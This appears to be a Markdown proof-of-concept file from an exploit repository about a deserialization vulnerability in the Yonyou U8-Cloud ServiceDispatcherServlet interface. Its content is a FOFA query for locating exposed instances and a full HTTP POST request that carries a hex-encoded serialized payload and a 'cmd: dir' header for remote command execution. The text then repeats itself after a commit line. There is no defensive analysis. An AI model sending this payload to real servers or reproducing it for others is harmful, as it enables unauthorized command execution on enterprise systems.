POC/wpoc/用友OA/用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞.md

## 用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞


## fofa
```
app="用友-NC-Cloud"
```


## poc
```
POST /ServiceDispatcherServlet HTTP/1.1
Host: 192.168.127.145:8088
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=1.9
Content-Type: application/x-www-form-urlencoded
cmd: dir

{{hexdec(00001914727189016C892E2F8BA278C72063787E59BEA3481C7201E17EC0BB31C2952D811155B0285DAE74215666F328294C95C02E25F12A9E10AA555FF7DFAC54D9292FFF217AB0D73F7DE5929A52F343395BF5C5C310D23D9F2D02E50163B4D8EAB83ED7BA0921E1EF25515DB82C728DDD2697642D6DB7A3E290124431013034ED434CBA2B37EE08AA03190FFD0049BA33542B8EC28B04A0003A167DA10442BFBBFC43285E0489C1B6B6EBD8F1F0E20742D7F96D4A24F4E319774ECFFDED69F951A965B15C3AAF66D7353EAF16F7B8F3DB1E82C1621D04775DBA169A9075040D3988CD49898DD9E0BAB6149A81F0DCE73BC2A076AEA9F51BF08ABB9466ED56F4E41D0D38CBF50F8E61212A8935DB2C97FF671AA42031DE2DB0F400C0120DE9D6714E935754035E6176C08FA220D677C9106BE646C87C6543534C3EB4B3FDC6859326154AEA6C9243B6460EBEFA69DE0D797085D0E89936CD8CBF00FFB645C7930F68CB2F46348F845DF2496EC6B7C20D2C7E359207D76A17C76ADFE6CA1D07B793EE3FF5E22DBE21CCA3786547D3ED56264360F028F744FEB799B96A884583A12BED9AF618ED8274AF99EBFBE8C539F40F0D5D4E5846F18E11750600F245865A6BCEE98D87CFD50E13E35EBCBB7BE63051E61EC9460E094D893E69AFCDAD48EC84CA426C1CB161D73F7DE5929A52F3252F1B7ACE20B728843D5C43668966247290B93BA2A3B28D5F2D9E2038902D0E088ED06B44F81942F6A772BFDF555BF8970FD067EE7D2E53703511CA23050357509DFFE6409CFFCAC645EA21F5E56F9805739630776DC9E20FE5CF42210EE94F83E3287DF06AEE3B50A515114DFA63A6C1BAF86E361C6525C6C6F07CCBA760BBF397503700E81BF0DCD2C31830611F796F669DB59792C7B487F77B83118FB9FBAFC557C4D956784891A2D045FA998AC391B72D3C9453A6098768DDDB2ED292BB9BDE0C9BE8F02193258C59455F2BE588EC4030D2BABF20B7D1B6097AAA80ACB5C82BAF355FBDB9EA57C156CF27E2CE9CE1CED68377B3254743F36D0F219BABCB8A65E7B86ABEC02FA984C6D426C4663F3221C91FCF7CE120F176EABA39E5C201BAF78832A0DBE8651833D5742B6D72C33B9CC75DE4027EE8A52F5DE1845465DE835FEADC3BFBD8C9545424E1B7C3BD3BA5C6C93456BAA98745DB91565E7BD98CEDDEACBC1509EFE5155D609C1E562BDE3160EB614CA0B2871F2D4FC083727A1F9FD311F8E47FB920046A5F572BC70A34B65C37A0B49C623F1553146CF4F657B01DD1900C041C7B2FC6BF6A796D4DC487351012DDBCF8D3DDA65AE8523DFB38B671DAFB37B64E58624E9686EC8EFA4707245C015FA8681126DD9F46A4D1F06ABFF6FD0F14E6BC9C560D96D9D6DE25648C3EF11C12F2851CFA9BC27B6C2FFE5F2BB5314FDABCDD2C2548021249F48717450589B3B1836FBC434DE15394D1E123DEF78C639BC25F23DA850128E8A2D4BA33E513ECEAF0FF1D69E9FF6D550F03CF9542B431EF3C989B1452758A8827848F68ECB9CE7946BF6CE999E0F8991073C789BA4A5D9EEFE4E0C6D7922D7D74944EAE32D93F2E8DC07B1849CA1981E978A43893AFECF4935A0A620B76A6D79612B45A495E3641D4E954767D85252D29F74B1B0589B3B1836FBC434DE15394D1E123DEF78C639BC25F23DA850128E8A2D4BA33E513ECEAF0FF1D69E9FF6D550F03CF9542B431EF3C989B1452758A8827848F68B45FDB6400AA3AAEF6A866EE04F858642C01704007B0B49CC92E90BD2C3633B30BFEA5D75B03AEE5BE94F3FB3C4F7F7C850128E8A2D4BA33EF5C7DBBFAEF493B7530C5DF412C99CBD7922D7D74944EAE32D93F2E8DC07B18E3A0007F071B8AC5AC2EA13A497295B17B23D7B8D2CB8C361E75FB46B8C791D430EBAB8B4DC02B4E7A3171C4911B7346A3DB3634F9379CB2AB013382A600359F8BC617E900DAE267709E3441CAC7B888E0C8AD34CFFF7097E8657197DB59B278FADA977B60FD9C7BD61AEA79889DC4705C30BFDD956C2DFCD7922D7D74944EAE32D93F2E8DC07B18E3A0007F071B8AC5AC2EA13A497295B17B23D7B8D2CB8C361E75FB46B8C791D4898AB957A256E3C3CCBA13E3BF5E2A03D1E4E6B83FCF1F5FEFC3112682470D57FEA36FFDA6B71C32AE1CB9C6EE0EAB9D629E46495A809EE75ADD37E6E357C3CC5CCB6CC666E124E837AAE72085EE01C31ACCE2A8A01891BB8AECE828BF46EEC97E7A8EAF4F72F4B30F412F8F618946924B8486B4D3A1D25066826A7BD5DD9F1E6D0C439DB578548510BBE4EDBB4CA7B4344C92ACD6E2CC0CE6E47D426CA65794158DBF8441D41B32CC28BF85FC1FD12E054D29342D6283EAA8C0CE9E97C24BE2D3A65726AFCA62F462016F6B655CE3CD69297E0BBBC227467A6D4F25939C36E9A195E0635F21A8CF8C91DD91548DA99F5B269F7628FB917ABBC9C9CB65DEA4135DC596FBFC00A20E344C92ACD6E2CC0CEABD14AEDDC9CD1395FDAE44775792BA98CF8271FC407A20D9C2F8BF4FD963367D9626FFB9C835E747BB6FAD1986B523DB1D46CD4274E55319D6E0E56140B4D3F951A965B15C3AAF66D7353EAF16F7B866398CBFAB242ACA727133295EB6F6BFBBE93EFBF6209849B80C54169081FF4F2FB3DE1F7A9B2A2111EF4BAEA41FAD59B0403999E053BD163D0ECCFA5814EF2BB49539BC2473CC2E52DA113D2D989EF97ABE91A6904D4842E1F66C4B8111C715C895270BCA5B2EE5048ABDABD3022CEADE64B85DD1F3FA82CC28BF85FC1FD12EB7DF248C06BAC45557B98FFC0988AD078AB1B631A903C576D732D57CB37DE4C2D8F81B3BD6C6863EC895270BCA5B2EE57F7D2D51D002DF8559C128348DD85FB7C7C983BC9FA90DD237140C
```

![image](https://github.com/wy876/POC/assets/139549762/a775721c-54fe-41f3-9cf9-b42201b23298)
first commit 2025-03-04 23:12:57 +08:00			`## 用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞`


			`## fofa`
			```
			`app="用友-NC-Cloud"`
			```


			`## poc`
			```
			`POST /ServiceDispatcherServlet HTTP/1.1`
			`Host: 192.168.127.145:8088`
			`Upgrade-Insecure-Requests: 1`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7`
			`Accept-Encoding: gzip, deflate`
			`Accept-Language: zh-CN,zh;q=1.9`
			`Content-Type: application/x-www-form-urlencoded`
			`cmd: dir`

			{{hexdec(00001914727189016C892E2F8BA278C72063787E59BEA3481C7201E17EC0BB31C2952D811155B0285DAE74215666F328294C95C02E25F12A9E10AA555FF7DFAC54D9292FFF217AB0D73F7DE5929A52F343395BF5C5C310D23D9F2D02E50163B4D8EAB83ED7BA0921E1EF25515DB82C728DDD2697642D6DB7A3E290124431013034ED434CBA2B37EE08AA03190FFD0049BA33542B8EC28B04A0003A167DA10442BFBBFC43285E0489C1B6B6EBD8F1F0E20742D7F96D4A24F4E319774ECFFDED69F951A965B15C3AAF66D7353EAF16F7B8F3DB1E82C1621D04775DBA169A9075040D3988CD49898DD9E0BAB6149A81F0DCE73BC2A076AEA9F51BF08ABB9466ED56F4E41D0D38CBF50F8E61212A8935DB2C97FF671AA42031DE2DB0F400C0120DE9D6714E935754035E6176C08FA220D677C9106BE646C87C6543534C3EB4B3FDC6859326154AEA6C9243B6460EBEFA69DE0D797085D0E89936CD8CBF00FFB645C7930F68CB2F46348F845DF2496EC6B7C20D2C7E359207D76A17C76ADFE6CA1D07B793EE3FF5E22DBE21CCA3786547D3ED56264360F028F744FEB799B96A884583A12BED9AF618ED8274AF99EBFBE8C539F40F0D5D4E5846F18E11750600F245865A6BCEE98D87CFD50E13E35EBCBB7BE63051E61EC9460E094D893E69AFCDAD48EC84CA426C1CB161D73F7DE5929A52F3252F1B7ACE20B728843D5C43668966247290B93BA2A3B28D5F2D9E2038902D0E088ED06B44F81942F6A772BFDF555BF8970FD067EE7D2E53703511CA23050357509DFFE6409CFFCAC645EA21F5E56F9805739630776DC9E20FE5CF42210EE94F83E3287DF06AEE3B50A515114DFA63A6C1BAF86E361C6525C6C6F07CCBA760BBF397503700E81BF0DCD2C31830611F796F669DB59792C7B487F77B83118FB9FBAFC557C4D956784891A2D045FA998AC391B72D3C9453A6098768DDDB2ED292BB9BDE0C9BE8F02193258C59455F2BE588EC4030D2BABF20B7D1B6097AAA80ACB5C82BAF355FBDB9EA57C156CF27E2CE9CE1CED68377B3254743F36D0F219BABCB8A65E7B86ABEC02FA984C6D426C4663F3221C91FCF7CE120F176EABA39E5C201BAF78832A0DBE8651833D5742B6D72C33B9CC75DE4027EE8A52F5DE1845465DE835FEADC3BFBD8C9545424E1B7C3BD3BA5C6C93456BAA98745DB91565E7BD98CEDDEACBC1509EFE5155D609C1E562BDE3160EB614CA0B2871F2D4FC083727A1F9FD311F8E47FB920046A5F572BC70A34B65C37A0B49C623F1553146CF4F657B01DD1900C041C7B2FC6BF6A796D4DC487351012DDBCF8D3DDA65AE8523DFB38B671DAFB37B64E58624E9686EC8EFA4707245C015FA8681126DD9F46A4D1F06ABFF6FD0F14E6BC9C560D96D9D6DE25648C3EF11C12F2851CFA9BC27B6C2FFE5F2BB5314FDABCDD2C2548021249F48717450589B3B1836FBC434DE15394D1E123DEF78C639BC25F23DA850128E8A2D4BA33E513ECEAF0FF1D69E9FF6D550F03CF9542B431EF3C989B1452758A8827848F68ECB9CE7946BF6CE999E0F8991073C789BA4A5D9EEFE4E0C6D7922D7D74944EAE32D93F2E8DC07B1849CA1981E978A43893AFECF4935A0A620B76A6D79612B45A495E3641D4E954767D85252D29F74B1B0589B3B1836FBC434DE15394D1E123DEF78C639BC25F23DA850128E8A2D4BA33E513ECEAF0FF1D69E9FF6D550F03CF9542B431EF3C989B1452758A8827848F68B45FDB6400AA3AAEF6A866EE04F858642C01704007B0B49CC92E90BD2C3633B30BFEA5D75B03AEE5BE94F3FB3C4F7F7C850128E8A2D4BA33EF5C7DBBFAEF493B7530C5DF412C99CBD7922D7D74944EAE32D93F2E8DC07B18E3A0007F071B8AC5AC2EA13A497295B17B23D7B8D2CB8C361E75FB46B8C791D430EBAB8B4DC02B4E7A3171C4911B7346A3DB3634F9379CB2AB013382A600359F8BC617E900DAE267709E3441CAC7B888E0C8AD34CFFF7097E8657197DB59B278FADA977B60FD9C7BD61AEA79889DC4705C30BFDD956C2DFCD7922D7D74944EAE32D93F2E8DC07B18E3A0007F071B8AC5AC2EA13A497295B17B23D7B8D2CB8C361E75FB46B8C791D4898AB957A256E3C3CCBA13E3BF5E2A03D1E4E6B83FCF1F5FEFC3112682470D57FEA36FFDA6B71C32AE1CB9C6EE0EAB9D629E46495A809EE75ADD37E6E357C3CC5CCB6CC666E124E837AAE72085EE01C31ACCE2A8A01891BB8AECE828BF46EEC97E7A8EAF4F72F4B30F412F8F618946924B8486B4D3A1D25066826A7BD5DD9F1E6D0C439DB578548510BBE4EDBB4CA7B4344C92ACD6E2CC0CE6E47D426CA65794158DBF8441D41B32CC28BF85FC1FD12E054D29342D6283EAA8C0CE9E97C24BE2D3A65726AFCA62F462016F6B655CE3CD69297E0BBBC227467A6D4F25939C36E9A195E0635F21A8CF8C91DD91548DA99F5B269F7628FB917ABBC9C9CB65DEA4135DC596FBFC00A20E344C92ACD6E2CC0CEABD14AEDDC9CD1395FDAE44775792BA98CF8271FC407A20D9C2F8BF4FD963367D9626FFB9C835E747BB6FAD1986B523DB1D46CD4274E55319D6E0E56140B4D3F951A965B15C3AAF66D7353EAF16F7B866398CBFAB242ACA727133295EB6F6BFBBE93EFBF6209849B80C54169081FF4F2FB3DE1F7A9B2A2111EF4BAEA41FAD59B0403999E053BD163D0ECCFA5814EF2BB49539BC2473CC2E52DA113D2D989EF97ABE91A6904D4842E1F66C4B8111C715C895270BCA5B2EE5048ABDABD3022CEADE64B85DD1F3FA82CC28BF85FC1FD12EB7DF248C06BAC45557B98FFC0988AD078AB1B631A903C576D732D57CB37DE4C2D8F81B3BD6C6863EC895270BCA5B2EE57F7D2D51D002DF8559C128348DD85FB7C7C983BC9FA90DD237140C
			```

			`![image](https://github.com/wy876/POC/assets/139549762/a775721c-54fe-41f3-9cf9-b42201b23298)`